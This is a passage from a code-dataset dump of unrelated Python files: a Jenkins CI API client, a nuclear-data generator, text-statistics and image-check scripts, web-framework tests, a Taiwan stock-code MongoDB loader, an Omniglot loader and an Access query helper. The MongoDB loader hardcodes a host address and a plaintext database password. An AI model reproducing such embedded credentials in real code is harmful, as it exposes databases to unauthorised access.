Game.update()\n","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"497440504","text":"\"\"\"Utilities for interacting with the Jenkins CI API.\"\"\"\n\nimport json\nimport logging\nfrom urllib.error import HTTPError\nfrom urllib.parse import (quote, urlencode)\n\nfrom reviewboard.hostingsvcs.service import HostingServiceHTTPRequest\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass JenkinsAPI(object):\n    \"\"\"Object for interacting with the Jenkins CI API.\"\"\"\n\n    def __init__(self, endpoint, job_name, username, password):\n        \"\"\"Initialize the object.\n\n        Args:\n            endpoint (unicode):\n                Jenkins server endpoint.\n\n            job_name (unicode):\n                Job name on Jenkins.\n\n            username (unicode):\n                Jenkins username.\n\n            password (unicode):\n                Jenkins password.\n        \"\"\"\n        self.endpoint = endpoint\n        self.job_name = job_name\n        self.username = username\n        self.password = password\n        self.csrf_protection_enabled = True\n        self.crumb = None\n        self.crumb_request_field = None\n\n    def test_connection(self):\n        \"\"\"Test the connection to the Jenkins server.\n\n        This is used for verifying both the URL and user credentials are\n        correct.\n        \"\"\"\n        self._make_request('%s/api/json?pretty=true' % self.endpoint,\n                           method='GET')\n\n    def start_build(self, patch_info):\n        \"\"\"Start a build.\n\n        Args:\n            patch_info (dict):\n                Contains the review ID, review branch, review diff revision\n                and the status update ID.\n\n        Raises:\n            urllib.error.URLError:\n                The HTTP request failed.\n        \"\"\"\n        data = {\n            'parameter': [\n                {\n                    'name': 'REVIEWBOARD_SERVER',\n                    'value': patch_info['reviewboard_server']\n                },\n                {\n                    'name': 'REVIEWBOARD_REVIEW_ID',\n                    'value': patch_info['review_id']\n                },\n                {\n                    'name': 'REVIEWBOARD_REVIEW_BRANCH',\n                    'value': patch_info['review_branch']\n            
},\n                {\n                    'name': 'REVIEWBOARD_DIFF_REVISION',\n                    'value': patch_info['diff_revision']\n                },\n                {\n                    'name': 'REVIEWBOARD_STATUS_UPDATE_ID',\n                    'value': patch_info['status_update_id']\n                }\n            ]\n        }\n\n        # This is not part of the official REST API, but is however listed in\n        # the Jenkins wiki as the correct way to initiate a remote build.\n        #\n        # This method of passing in the build parameters may change in the\n        # future.\n        self._make_request(\n            '%s/job/%s/build' % (self.endpoint,\n                                 quote(self.job_name)),\n            body=urlencode({\n                'json': json.dumps(data, sort_keys=True)\n            }),\n            content_type='application/x-www-form-urlencoded',\n            method='POST'\n        )\n\n    def _fetch_csrf_token(self):\n        \"\"\"Fetches a CSRF token from the Jenkins server.\n\n        This is required for making requests to API endpoints when using basic\n        authentication. A crumb is no longer required when using API token\n        authentication to access buildWithParameters.\n        \"\"\"\n        data = self._make_raw_request('%s/crumbIssuer/api/json'\n                                      % self.endpoint)\n\n        result = json.loads(data)\n\n        self.crumb = result['crumb']\n        self.crumb_request_field = result['crumbRequestField']\n
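\n    # The fetched crumb is replayed on each later request as a header whose name\n    # comes from crumbRequestField (commonly \"Jenkins-Crumb\") -- see\n    # _make_raw_request() below.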
\n\n    def _make_request(self, url, body=None, method='GET',\n                      content_type=''):\n        \"\"\"Make an HTTP request.\n\n        This will first attempt to fetch a CSRF token if we do not currently\n        have one.\n\n        Args:\n            url (unicode):\n                The URL to make the request against.\n\n            body (unicode or bytes, optional):\n                The content of the request.\n\n            method (unicode, optional):\n                The request method. If not provided, it defaults to a ``GET``\n                request.\n\n            content_type (unicode, optional):\n                The type of the content being POSTed.\n\n        Returns:\n            bytes:\n                The contents of the HTTP response body.\n\n        Raises:\n            urllib.error.URLError:\n                The HTTP request failed.\n        \"\"\"\n        if self.csrf_protection_enabled and not self.crumb:\n            try:\n                self._fetch_csrf_token()\n            except HTTPError as e:\n                if e.code == 404:\n                    self.csrf_protection_enabled = False\n                else:\n                    raise e\n\n        return self._make_raw_request(url, body, method, content_type)\n\n    def _make_raw_request(self, url, body=None, method='GET',\n                          content_type=''):\n        \"\"\"Make an HTTP request.\n\n        Args:\n            url (unicode):\n                The URL to make the request against.\n\n            body (unicode or bytes, optional):\n                The content of the request.\n\n            method (unicode, optional):\n                The request method. If not provided, it defaults to a ``GET``\n                request.\n\n            content_type (unicode, optional):\n                The type of the content being POSTed.\n\n        Returns:\n            bytes:\n                The contents of the HTTP response body.\n\n        Raises:\n            urllib.error.URLError:\n                The HTTP request failed.\n        \"\"\"\n        logger.debug('Making request to Jenkins CI %s', url)\n\n        headers = {}\n\n        if self.crumb:\n            headers[self.crumb_request_field] = self.crumb\n\n        if content_type:\n            headers['Content-Type'] = content_type\n\n        if isinstance(body, str):\n            body = body.encode('utf-8')\n\n        request = HostingServiceHTTPRequest(\n            url,\n            body=body,\n            method=method,\n            headers=headers)\n        request.add_basic_auth(self.username, self.password)\n\n        return self._open_request(request)\n\n    def _open_request(self, request):\n        \"\"\"Perform an HTTP request.\n\n        Args:\n            request (reviewboard.hostingsvcs.service.\n                     HostingServiceHTTPRequest):\n                The HTTP request object.\n\n        Returns:\n            bytes:\n                The response data.\n        \"\"\"\n        response = request.open()\n        return response.data\n","sub_path":"rbintegrations/jenkinsci/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":6561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"392097079","text":"#! /bin/env python\n\n# <<BEGIN-copyright>>\n# Copyright (c) 2016, Lawrence Livermore National Security, LLC.\n# Produced at the Lawrence Livermore National Laboratory.\n# Written by the LLNL Nuclear Data and Theory group\n# (email: mattoon1@llnl.gov)\n# LLNL-CODE-683960.\n# All rights reserved.\n# \n# This file is part of the FUDGE package (For Updating Data and \n# Generating Evaluations)\n# \n# When citing FUDGE, please use the following reference:\n# C.M. Mattoon, B.R. Beck, N.R. Patel, N.C. Summers, G.W. Hedstrom, D.A. Brown, \"Generalized Nuclear Data: A New Structure (with Supporting Infrastructure) for Handling Nuclear Data\", Nuclear Data Sheets, Volume 113, Issue 12, December 2012, Pages 3145-3171, ISSN 0090-3752, http://dx.doi.org/10.1016/j.nds.2012.11.008\n# \n# \n# Please also read this link - Our Notice and Modified BSD License\n# \n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the disclaimer below.\n# * Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the disclaimer (as noted below) in the\n# documentation and/or other materials provided with the distribution.\n# * Neither the name of LLNS/LLNL nor the names of its contributors may be used\n# to endorse or promote products derived from this software without specific\n# prior written permission.\n# \n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\n# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL LAWRENCE LIVERMORE NATIONAL SECURITY, LLC,\n# THE U.S. 
DEPARTMENT OF ENERGY OR CONTRIBUTORS BE LIABLE FOR ANY\n# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\n# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n# \n# \n# Additional BSD Notice\n# \n# 1. This notice is required to be provided under our contract with the U.S.\n# Department of Energy (DOE). This work was produced at Lawrence Livermore\n# National Laboratory under Contract No. DE-AC52-07NA27344 with the DOE.\n# \n# 2. Neither the United States Government nor Lawrence Livermore National Security,\n# LLC nor any of their employees, makes any warranty, express or implied, or assumes\n# any liability or responsibility for the accuracy, completeness, or usefulness of any\n# information, apparatus, product, or process disclosed, or represents that its use\n# would not infringe privately-owned rights.\n# \n# 3. Also, reference herein to any specific commercial products, process, or services\n# by trade name, trademark, manufacturer or otherwise does not necessarily constitute\n# or imply its endorsement, recommendation, or favoring by the United States Government\n# or Lawrence Livermore National Security, LLC. The views and opinions of authors expressed\n# herein do not necessarily state or reflect those of the United States Government or\n# Lawrence Livermore National Security, LLC, and shall not be used for advertising or\n# product endorsement purposes.\n# \n# <<END-copyright>>\n\nimport sys, math\n\nyi = int( sys.argv[1] )\nZA = int( sys.argv[2] )\nworkDir = sys.argv[3]\n\nfrom fudge.legacy.endl import bdfls\nendl_bdfls = bdfls.getDefaultBdfls ( template = '/usr/gapps/data/nuclear/bdfls.archive/bdfls.Audi_etal.2003.12.22')\nfrom fudge.legacy import endl\n\ndef xSec( Es, z1, m1, z2, m2 ) :\n\n    if( z2 == 0 ) : z2 = 1e-10\n    m = ( m1 + m2 ) / m2\n    C = 2.07323e-2 * math.pi / 2 * z1 * z1 * z2 * z2 * m * m * 16.16666667\n    xsecs = []\n    for E in Es : xsecs.append( [ E, C / E / E ] )\n    return( xsecs )\n\nnumber, EMin, EMax = 200, 1e-4, 30\nfrac = math.pow( EMax / EMin, 1. 
/ number )\nenergies = [ EMin * math.pow( frac, i1 ) for i1 in range( number ) ]\nenergies.append( EMax )\n\nangularStr = \"\"\"-1.00000e+00 1.53490e-02\n -8.21610e-01 1.85030e-02\n -6.65520e-01 2.21340e-02\n -5.20570e-01 2.65540e-02\n -3.97930e-01 3.14180e-02\n -2.86440e-01 3.71000e-02\n -1.86090e-01 4.36430e-02\n -1.88510e-02 5.91470e-02\n  1.26090e-01 8.03940e-02\n  2.37590e-01 1.05630e-01\n  3.37930e-01 1.40070e-01\n  4.15980e-01 1.80010e-01\n  4.94020e-01 2.39820e-01\n  5.49770e-01 3.02890e-01\n  5.94370e-01 3.73150e-01\n  6.38970e-01 4.71030e-01\n  6.72410e-01 5.72140e-01\n  7.05860e-01 7.09630e-01\n  7.39310e-01 9.03460e-01\n  7.61610e-01 1.08040e+00\n  7.83910e-01 1.31480e+00\n  8.06210e-01 1.63480e+00\n  8.28510e-01 2.08760e+00\n  8.39660e-01 2.38810e+00\n  8.61950e-01 3.22180e+00\n  8.73100e-01 3.81280e+00\n  8.84250e-01 4.58280e+00\n  8.95400e-01 5.61180e+00\n  9.06550e-01 7.03060e+00\n  9.17700e-01 9.06470e+00\n  9.28850e-01 1.21280e+01\n  9.39900e-01 1.69980e+01\n  9.40000e-01 0.00000e+00\n  1.00000e+00 0.00000e+00\"\"\"\n\nproject = endl.endlProject( projectile = yi, workDir = workDir )\ntarget = project.addZA( ZA )\n\nhalflife = endl_bdfls.halflife( ZA )\nif( halflife is None ) : # Happens when bdfls file does not have halflife for ZA.\n    ZA_halflife = target.ZA\n    if( target.ZA % 1000 == 0 ) : ZA_halflife = 0\n    halflife = { 0 : 1e50, 99120 : 1e50, 99125 : 1e50, 24047 : 0.5, 28067 : 27., 30073 : 23.5 }[ZA_halflife]\n\nxSecData = xSec( energies, project.Z, project.mass, target.Z, endl_bdfls.mass( target.ZA ) )\nfileI0 = target.addFile( 0, 8, 0, 0 )\nfileI0.addData( xSecData, halflife = halflife )\n\nangularData = angularStr.split( '\\n' )\nangularData = [ map( float, line.split( ) ) for line in angularData ]\nangularData = [ [ EMin, angularData ], [ EMax, angularData ] ]\nfileI1 = target.addFile( yi, 8, 1, 0 )\nfileI1.addData( angularData, halflife = halflife )\n\nproject.save( )\n","sub_path":"fudge/legacy/endl/largeAngleCoulombScattering_generator.py","file_name":"largeAngleCoulombScattering_generator.py","file_ext":"py","file_size_in_byte":6281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"560880801","text":"import pandas as pd\nfrom nltk.corpus import stopwords\n\n# Stopwords\nstop = stopwords.words('english')\n\n# Claps into float\ndef mod_claps(claps):\n    if claps[-1] == 'K':\n        claps = float(claps[0:-1])*1000\n    else:\n        claps = float(claps)\n    return(claps)\n
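\n# e.g. (illustrative): mod_claps('4.2K') -> 4200.0, mod_claps('856') -> 856.0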
\n\n# Average word length\ndef avg_word(sentence):\n    words = sentence.split()\n    return (sum(len(word) for word in words)/len(words))\n\n# Count of claps on each link\ndef claps_count(link_1, claps_1, link_2, claps_2):\n    for i in range(len(link_1)):\n        link = link_1[i]\n        claps_1[i] = 0\n        for j in range(len(link_2)):\n            if link == link_2[j]:\n                claps_1[i] = claps_1[i] + claps_2[j]\n    return(claps_1)\n\n# Read original CSV\ndata = pd.read_csv('./datasets/mod_articles.csv', engine = 'python', encoding = 'utf-8')\n\n# Create new CSV with info about original CSV\ninfo_data = pd.DataFrame(columns = ['author', 'title', 'reading_time', 'claps', 'link', 'word_count', 'stopwords_count', 'avg_word', 'num_count'], index = range(len(data)))\n\n# Author\ninfo_data['author'] = data['author']\n# Title\ninfo_data['title'] = data['title']\n# Reading Time\ninfo_data['reading_time'] = data['reading_time']\n# Claps\ninfo_data['claps'] = data['claps'].apply(lambda x: mod_claps(x))\n# Link\ninfo_data['link'] = data['link'].apply(lambda x: str(x)[8::].split('/')[0])\n# Number of Words\ninfo_data['word_count'] = data['text'].apply(lambda x: len(str(x).split(\" \"))) \n# Number of stopwords\ninfo_data['stopwords_count'] = data['text'].apply(lambda x: len([x for x in x.split() if x in stop])) \n# Average Word Length\ninfo_data['avg_word'] = data['text'].apply(lambda x: avg_word(x)) \n# Number of numerics\ninfo_data['num_count'] = data['text'].apply(lambda x: len([x for x in x.split() if x.isdigit()]))\n\n# info_data to new CSV\ninfo_data.to_csv('./datasets/info_data.csv')\n\n# Links count\nlink_freq = pd.Series(' '.join(info_data['link']).split()).value_counts()\n\n# Create new CSV with info about links\nlink_data = pd.DataFrame(columns = ['link', 'link_count', 'claps_count'], index = range(len(link_freq)))\n\n# Links\nlink_data['link'] = link_freq.index\n# Count of link\nlink_data['link_count'] = link_freq.values\n# Count of claps\nlink_data['claps_count'] = claps_count(link_data['link'], link_data['claps_count'], info_data['link'], info_data['claps'])\n\nlink_data.to_csv('./datasets/link_data.csv')","sub_path":"text_pp_scripts/01_info_link_data.py","file_name":"01_info_link_data.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"171096887","text":"import cv2\nimport numpy as np\n\ndef draw_landmarks(image, landmarks):\n    sample_image = image.copy()\n    sample_landmarks = list(landmarks.copy())\n\n    for (x, y) in sample_landmarks:\n        cv2.circle(sample_image, (int(x), int(y)), radius=1, color=(0, 0, 255), thickness=-1)\n\n    sample_image = cv2.resize(sample_image, (640, 480))\n    cv2.imshow(\"sample_image\", sample_image)\n    cv2.waitKey(0)\n\n\ndef check_data(data):\n    image_path = data[0]\n    labels = data[1:]\n\n    image = cv2.imread(image_path)\n    height, width = image.shape[:2]\n\n    landmarks = np.array(labels[:196], np.float32).reshape(-1, 2)\n    attributes = np.array(labels[196:202], np.float32)\n    euler_angles = np.array(labels[202:], np.float32)\n    \n    print(image_path)\n    draw_landmarks(image, landmarks * height)\n\n\nif __name__ == \"__main__\":\n    data_list = \"/data/Datasets/WFLW/test_data_98pts/list.txt\"\n    f = open(data_list, \"r\")\n    lines = f.readlines()\n\n    for line in lines:\n        line = line.strip().split()\n        check_data(line)","sub_path":"source/face_landmark/PFLD/data/98pts/dataset_check.py","file_name":"dataset_check.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"210749832","text":"import json\nimport pytest\nimport tornado.gen\nimport tornado.ioloop\nimport util.dicts\nimport util.net\nimport pool.proc\nimport web\n\ndef test_non_2XX_codes():\n    async def handler(req):\n        1 / 0\n    app = web.app([('/', {'get': handler})])\n    with web.test(app) as url:\n        resp = web.get_sync(url)\n        assert '1 / 0' not in resp['body']\n        assert resp['code'] == 500\n\ndef test_normal_app():\n    async def handler(req):\n        return {'body': 'asdf'}\n    port = util.net.free_port()\n    web.app([('/', {'get': handler})]).listen(port)\n    proc = pool.proc.new(tornado.ioloop.IOLoop.current().start)\n    url = f'http://0.0.0.0:{port}'\n    assert web.get_sync(url)['body'] == 'asdf'\n    proc.terminate()\n\ndef test_get_timeout():\n    async def handler(req):\n        if 'sleep' in req['query']:\n            await tornado.gen.sleep(1)\n            handler._sleep = True\n        return {}\n    async def main(url):\n        await web.get(url + '?sleep', timeout=.001)\n    app = web.app([('/', {'get': handler})])\n    with web.test(app) as url:\n        with pytest.raises(web.Timeout):\n            tornado.ioloop.IOLoop.instance().run_sync(lambda: 
main(url))\n\ndef test_get():\n async def handler(req):\n return {'body': 'ok',\n 'code': 200,\n 'headers': {'foo': 'bar'}}\n async def main(url):\n resp = await web.get(url)\n assert resp['body'] == 'ok'\n assert resp['code'] == 200\n assert resp['headers']['foo'] == 'bar'\n app = web.app([('/', {'get': handler})])\n with web.test(app) as url:\n tornado.ioloop.IOLoop.instance().run_sync(lambda: main(url))\n\ndef test_get_params():\n async def handler(req):\n return {'body': json.dumps(req['query'])}\n async def main(url):\n resp = await web.get(url, query={'foo': 'bar'})\n assert json.loads(resp['body']) == {'foo': 'bar'}\n app = web.app([('/', {'get': handler})])\n with web.test(app) as url:\n tornado.ioloop.IOLoop.instance().run_sync(lambda: main(url))\n\ndef test_post():\n async def handler(req):\n body = json.loads(req['body'])\n return {'code': body['num'] + 1}\n async def main(url):\n resp = await web.post(url, json.dumps({'num': 200}))\n assert resp['code'] == 201\n app = web.app([('/', {'post': handler})])\n with web.test(app) as url:\n tornado.ioloop.IOLoop.instance().run_sync(lambda: main(url))\n\ndef test_post_timeout():\n async def handler(req):\n await tornado.gen.sleep(1)\n return {'code': 200}\n async def main(url):\n resp = await web.post(url, '', timeout=.001)\n assert resp['code'] == 201\n app = web.app([('/', {'post': handler})])\n with web.test(app) as url:\n with pytest.raises(web.Timeout):\n tornado.ioloop.IOLoop.instance().run_sync(lambda: main(url))\n\ndef test_basic():\n async def handler(req):\n assert req['verb'] == 'get'\n return {'headers': {'foo': 'bar'},\n 'code': 200,\n 'body': 'ok'}\n app = web.app([('/', {'get': handler})])\n with web.test(app) as url:\n resp = web.get_sync(url)\n assert resp['body'] == 'ok'\n assert resp['headers']['foo'] == 'bar'\n\ndef test_middleware():\n def middleware(old_handler):\n async def new_handler(req):\n req = util.dicts.merge(req, {'headers': {'asdf': ' [mod req]'}})\n resp = await old_handler(req)\n resp = util.dicts.merge(resp, {'body': resp['body'] + ' [mod resp]'})\n return resp\n return new_handler\n @middleware\n async def handler(req):\n return {'headers': {'foo': 'bar'},\n 'code': 200,\n 'body': 'ok' + req['headers']['asdf']}\n app = web.app([('/', {'get': handler})])\n with web.test(app) as url:\n resp = web.get_sync(url)\n assert resp['body'] == 'ok [mod req] [mod resp]'\n\ndef test_url_params():\n async def handler(req):\n return {'code': 200,\n 'body': json.dumps(req['query'])}\n app = web.app([('/', {'get': handler})])\n with web.test(app) as url:\n resp = web.get_sync(url + '/?asdf=123&foo=bar&foo=notbar&stuff')\n assert json.loads(resp['body']) == {'asdf': '123',\n 'foo': ['bar', 'notbar'],\n 'stuff': ''}\n\ndef test_url_kwargs():\n async def handler(req):\n return {'code': 200,\n 'body': json.dumps(req['kwargs']['foo'])}\n app = web.app([('/:foo/stuff', {'get': handler})])\n with web.test(app) as url:\n resp = web.get_sync(url + '/something/stuff')\n assert json.loads(resp['body']) == 'something', resp\n\ndef test_url_args():\n async def handler(req):\n return {'code': 200,\n 'body': json.dumps(req['args'])}\n app = web.app([('/(.*)/(.*)', {'get': handler})])\n with web.test(app) as url:\n resp = web.get_sync(url + '/something/stuff')\n assert json.loads(resp['body']) == ['something', 'stuff'], resp\n\ndef test_validate():\n async def handler(req):\n return {'code': 200,\n 'body': json.dumps(req['query'])}\n app = web.app([('/', {'get': handler})])\n with web.test(app) as url:\n resp = web.get_sync(url + 
'/?asdf=123&foo=bar&foo=notbar&stuff')\n assert json.loads(resp['body']) == {'asdf': '123',\n 'foo': ['bar', 'notbar'],\n 'stuff': ''}\n","sub_path":"tests/test_web.py","file_name":"test_web.py","file_ext":"py","file_size_in_byte":5460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"513113299","text":"import twstock\r\nimport pymongo\r\nimport time\r\n\r\n#http://www.tej.com.tw/webtej/doc/wind1.htm\r\nformat = {'水泥工業' :'01', '食品工業' : '02', '塑膠工業' :'03'\r\n , '紡織纖維' :'04', '電機機械' : '05', '電器電纜' :'06'\r\n , '玻璃陶瓷' :'08', '造紙工業' : '09', '鋼鐵工業' :'10'\r\n , '橡膠工業' :'11', '汽車工業' : '12', '建材營造業' :'14'\r\n , '航運業' :'15', '觀光事業' : '16', '金融保險業' :'17'\r\n , '貿易百貨業' :'18', '綜合' : '19', '其他業' :'20'\r\n , '化學工業' :'21', '生技醫療業' : '22', '油電燃氣業' :'23'\r\n , '半導體業' :'24', '電腦及週邊設備業': '25', '光電業' : '26'\r\n , '通信網路業' :'27', '電子零組件業' : '28', '電子通路業' :'29'\r\n , '資訊服務業' :'30', '其他電子業' : '31', '文化創意業' :'32'\r\n , '農業科技業' :'33', '電子商務' : '34', '管理股票' :'80'\r\n , 'OTHER':'00'}\r\n\r\nclient = pymongo.MongoClient(\"mongodb://172.18.0.2:27017\")\r\n#client = pymongo.MongoClient(\"mongodb://192.168.1.5:27017\")\r\ndb = client[\"twStock\"] \r\ndb.authenticate(\"twstock\", \"twstock123\")\r\ncollTPEX = db[\"TPEX\"]\r\ncollTWSE = db[\"TWSE\"]\r\ntwstock.__update_codes()\r\ncollTPEX.delete_many({})\r\ncollTWSE.delete_many({})\r\n\"\"\"\r\n$group : {\r\n $code : {\r\n 'type' : $type\r\n ,'name' : $namme\r\n ,'ISIN' : $ISIN\r\n ,'start' : $start\r\n ,'market' : $market\r\n ,'CFI' : $CFI\r\n }\r\n}\r\n\"\"\"\r\n#取得TPEX\r\n#tpexG = {}\r\nfor k,v in twstock.tpex.items():\r\n groupN = \"\"\r\n if v.group == \"\":\r\n groupN = \"OTHER\"\r\n else:\r\n groupN = v.group\r\n \r\n data = {\r\n 'group' : groupN\r\n ,'code' : v.code\r\n ,'type' : v.type\r\n ,'groupCode' : format[groupN]\r\n ,'name' : v.name\r\n ,'ISIN' : v.ISIN\r\n ,'start' : v.start\r\n ,'market' : v.market\r\n ,'CFI' : v.CFI \r\n }\r\n collTPEX.insert_one(data)\r\n \"\"\"\r\n if groupN in tpexG:\r\n tpexG[groupN].update(data)\r\n else:\r\n tpexG[groupN] = data\r\n \"\"\"\r\n\r\n#取得TWSE\r\n#twseG = {}\r\nfor k,v in twstock.twse.items():\r\n groupN = \"\"\r\n if v.group == \"\":\r\n groupN = \"OTHER\"\r\n else:\r\n groupN = v.group\r\n \r\n data = {\r\n 'group' : groupN\r\n ,'code' : v.code\r\n ,'type' : v.type\r\n ,'groupCode' : format[groupN]\r\n ,'name' : v.name\r\n ,'ISIN' : v.ISIN\r\n ,'start' : v.start\r\n ,'market' : v.market\r\n ,'CFI' : v.CFI\r\n }\r\n collTWSE.insert_one(data)\r\n \"\"\"\r\n if groupN in twseG:\r\n twseG[groupN].update(data)\r\n else:\r\n twseG[groupN] = data\r\n \"\"\"\r\n#collTWSE.insert_one(twseG)\r\n#for k,v in twstock.tpex.items():\r\n# print(k)\r\n#print(twstock.tpex[\"1240\"].type)\r\n#v = twstock.tpex[\"1240\"]\r\n#print(v)","sub_path":"app/TPEX_TWSE_upCode.py","file_name":"TPEX_TWSE_upCode.py","file_ext":"py","file_size_in_byte":3146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"294152963","text":"import numpy as np\nimport paddle\nimport paddle.fluid as fluid\nimport pickle as pkl\nfrom PIL import Image\nimport os\nimport glob\nimport csv\nimport random\n\nclass LoadData():\n def __init__(self,mode):\n self.mode = mode\n self.datafile = 'data/omniglot/data/'\n print('loading omniglot dataset from {} ......'.format(self.datafile))\n if self.mode == 'train':\n character_folders = [[os.path.join(self.datafile, family, character)] \\\n for family in os.listdir(self.datafile) \\\n if 
os.path.isdir(os.path.join(self.datafile, family)) \\\n                        for character in os.listdir(os.path.join(self.datafile, family))]\n            random.shuffle(character_folders)\n            character_folders_train = character_folders[:1200]\n            character_folders_val = character_folders[1200:1300]\n            character_folders_test = character_folders[1300:]\n            with open('data/omniglot/train.csv','w') as file:\n                wr = csv.writer(file)\n                wr.writerows(character_folders_train)\n            with open('data/omniglot/val.csv','w') as file:\n                wr = csv.writer(file)\n                wr.writerows(character_folders_val)\n            with open('data/omniglot/test.csv','w') as file:\n                wr = csv.writer(file)\n                wr.writerows(character_folders_test) \n\n        csv_path = 'data/omniglot/' + self.mode + '.csv'\n        lines = [x.strip() for x in open(csv_path, 'r').readlines()]\n        data = []\n        labels = []\n        rotate_angles = [0,90,180,270]\n        label_index = 0\n        for x in lines:\n            class_names = glob.glob(os.path.join(x, '*'))\n            for angle in rotate_angles:\n                class_imgs = [np.asarray(Image.open(file).rotate(angle)) for file in class_names]\n                class_labels = [label_index for _ in range(len(class_imgs))]\n                data += class_imgs\n                labels += class_labels\n                label_index += 1\n        self.n_classes = label_index\n        self.data = data\n        self.label = np.array(labels)\n        print('omniglot dataset {} load done'.format(self.mode))\n\n    def __getitem__(self, index):\n        images = np.stack([self.data[i] for i in index])\n        label = np.stack([self.label[i] for i in index])\n        imgs = np.expand_dims(images, axis=1)\n        return imgs, label\n\n\n\n\n","sub_path":"CV/PaddleFSL/dataloader/omniglot.py","file_name":"omniglot.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"636158288","text":"__author__ = 'Мирослава'\n'''\nFunctions for accessing data from tables in an Access database\n'''\n\nimport pypyodbc\nimport os.path\n\npypyodbc.lowercase = False\n\ndef mdbTableList(cursor):\n    # returns the lists of tables and queries in the database\n    tab = cursor.tables()\n    tableList = []\n    queryList = []\n    for t in tab:\n        if t[3] == \"TABLE\": tableList.append(t[2])\n        if t[3] == \"VIEW\" : queryList.append(t[2])\n    return tableList, queryList\n\ndef mdbColumnList(cursor, table):\n    # returns the list of field names in a table of the database\n    col = cursor.columns(table=table)\n    columnList = []\n    for c in col:\n        columnList.append(c[3])\n    return columnList\n\ndef mdbColumnParameters(cursor, table, column):\n    # returns a tuple with the parameters of the selected column\n    col = cursor.columns(table=table, column=column)\n    l = list(col)\n    t = l[0]\n    return t\n\ndef rowAttributes(row):\n    # returns a dictionary: {columnName: n},\n    # where n is the index of the element in the row tuple\n    # that corresponds to the column named columnName\n    coldict = {}\n    # it also returns a list of the same column names\n    # (ordered, unlike the dictionary)\n    collist = []\n    for i in range(len(row.cursor_description)):\n        columnName = row.cursor_description[i][0]\n        collist.append(columnName)\n        coldict[columnName] = i\n    return coldict, collist\n\ndef allfieldnamesprint(cursor):\n    print('-'*50)\n    print('PRINTING THE COLUMN NAMES OF ALL TABLES IN THE access DATABASE:')\n    tableList, queryList = mdbTableList(cursor)\n    for table in tableList:\n        print('-'*50)\n        print('table=', table)\n        print('-'*50)\n        columnList = mdbColumnList(cursor, table)\n        for column in columnList:\n            columnParameters = mdbColumnParameters(cursor, table, column)\n            s = '\"%s\"' % columnParameters[3]\n            print(': %-40s' % s)\n\ndef get_mdb_connection(mdbfilepath):\n    pypyodbc.lowercase = False\n    connection = pypyodbc.win_connect_mdb(mdbfilepath)\n    return connection\n\ndef close_mdb_connection(connection):\n    # connection.cursor.close()\n    connection.commit()\n    connection.close()\n\ndef mdb_investigation(mdbfilepath):\n    # Explores an unknown mdb file\n    connection = get_mdb_connection(mdbfilepath)\n    cursor = connection.cursor()\n    allfieldnamesprint(cursor)\n    print('-'*50)\n    close_mdb_connection(connection)\n\ndef all_data_print_from_mdb(mdbfilepath, tableName):\n    # prints all data from an mdb table\n    connection = get_mdb_connection(mdbfilepath)\n    cursor = connection.cursor()\n    fields = \"*\"\n    condition = \"\"\n    sqlcommand = \"SELECT %s FROM %s %s\" % (fields, tableName, condition)\n    cursor.execute(sqlcommand)\n\n    print('-'*50)\n    attr = False\n    while True:\n        row = cursor.fetchone()\n        if not row: break\n        print('row=', row)\n        if not attr:\n            attr = True\n            coldict, collist = rowAttributes(row)\n            # print(coldict)\n            # print(collist)\n            print('-'*50)\n            # input()\n\n    print('-'*50)\n\n    close_mdb_connection(connection)\n\n\n\nif __name__ == '__main__':\n\n    # mdbfiledir = 'c:/PyPrograms/PyRoman/mdbaccess/'\n    # mdbfilename = 'Список Кооперативу Example.mdb'\n    # mdbfilepath = mdbfiledir + mdbfilename\n    mdbfiledir = r'D:\\Файли з Lenovo\\Роман\\Кооп Пасічний\\1с Кооп 2013 11 30\\Db-Koop'\n    mdbfilename = r'1c Кооп 2013 11 30 Access.accdb'\n    mdbfilepath = os.path.join(mdbfiledir, mdbfilename)\n    print(mdbfilepath)\n\n    mdb_investigation(mdbfilepath)\n","sub_path":"mdbaccess.py","file_name":"mdbaccess.py","file_ext":"py","file_size_in_byte":3894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"327741449","text":"import traceback\r\nimport maya.OpenMaya as om\r\n\r\nfrom PySide2 import QtCore\r\nfrom PySide2.QtCore import Qt\r\nfrom PySide2 import QtWidgets\r\nfrom PySide2.QtWidgets import *\r\nfrom shiboken2 import 